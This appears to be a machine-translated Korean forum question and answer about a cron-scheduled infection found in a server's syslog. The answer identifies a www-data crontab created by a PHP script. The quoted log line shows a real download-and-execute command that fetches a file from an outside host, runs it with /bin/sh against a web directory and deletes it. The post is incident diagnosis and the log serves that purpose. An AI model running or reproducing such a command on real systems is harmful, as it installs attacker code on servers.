시스템 로그에서 PHP 악성코드 발견

시스템 로그에서 PHP 악성코드 발견

1분마다 실행되는 악성 코드가 있고 /var/log/syslog에서 볼 수 있습니다.

Feb  1 18:30:01 MENCH CRON[1768]: (www-data) CMD (wget -q -O xxxd http://hello.hahaha666.xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /var/www/website.com 24 && rm -f xxxd)

어떤 PHP 스크립트가 실행되고 있는지 어떻게 알 수 있나요?

서버에는 nginx, php fpm, 4개의 작은 웹사이트와 mysql만 있습니다. 그게 다야

고쳐 쓰다 nginx를 중지하면 호출이 1분마다 계속 실행됩니다.

답변1

일부 PHP 스크립트에 의해 생성된 /var/spool/cron/crontabs에 www-data 파일이 있습니다. 해결됨

관련 정보